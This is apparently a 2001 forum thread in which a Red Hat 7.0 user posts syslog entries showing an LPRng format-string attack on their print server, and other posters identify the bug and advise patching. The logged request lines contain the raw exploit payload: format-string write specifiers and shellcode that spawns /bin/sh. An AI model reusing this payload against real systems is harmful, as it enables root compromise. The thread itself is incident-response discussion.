LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (http://www.linuxquestions.org/questions/linux-security-4/)
-   -   Dispatch_input: bad request line (http://www.linuxquestions.org/questions/linux-security-4/dispatch_input-bad-request-line-2216/)

Advocate 05-01-2001 07:05 AM

RH7.0
This I read most likely comprimised my root.
What other logs can I look in to try and get an idea of what this person did at 3:30 am last nite?
This was out of my /var/log/messages :
******************************************************
Apr 30 03:31:08 linux SERVER[6812]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
52u%300$n%.25u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6813]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
48u%300$n%.29u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6814]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
44u%300$n%.33u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6815]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
40u%300$n%.37u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6816]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
36u%300$n%.41u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6817]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
32u%300$n%.45u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6818]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
28u%300$n%.49u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:10 linux SERVER[6819]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
24u%300$n%.53u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:10 linux SERVER[6820]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
20u%300$n%.57u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
****************************************************

How can I stop this? Fawwwwwwwk!

raz 05-02-2001 06:53 AM

Advovate,

Someone has "attempted" to get into your system through LPR's logging function.

Doesn't look like they got root access but they did use the LPRng string format _syslog bug, that could allow root access.

So far to my knowledge no one has managed to get root through this bug.

I have one suggestion just in case
GO PATCH IT NOW....

Then all those nasty messages will go away.

i386:
ftp://updates.redhat.com/7.0/en/os/i....24-2.i386.rpm

sources:
ftp://updates.redhat.com/7.0/en/os/S...6.24-2.src.rpm

Check out the command "last" and work out who was logged on at that time.

Bye,
/Raz




Advocate 05-03-2001 06:36 AM

Thanks RazBot
 
I appreciate you taking the time to view the post.

And not having root comprimised was such a relief to see you say!

I have already upgraded to RH7.1 (Seawolf). The one message I didnt post from my log file is as follows:
(this entry was made 30 seconds before the LPRng exploit started happening, would you consider this a likely candidate for the source?)

Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'

Again thanks for your time! :)

raz 05-04-2001 02:31 AM

Advocate,

I that log message was not the person entering your system, but it is a message resulting in something they may have done with DIG or NSLOOKUP.

I guess they have been on the system before that time you got in the first LPRng bug logs.

------------
Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'
------------

The DNS records say that 216.219.239.221 should be a server for the 216.219.239.0 zone, but when in'239.219.216.in-addr. was asked for a record in the 216.219.239.0 it said that it wasn't authorities for that zone.
i.e a zone transfer attempt failed.

Looks like they knew what they were doing.

/Raz




All times are GMT -5. The time now is 02:46 PM.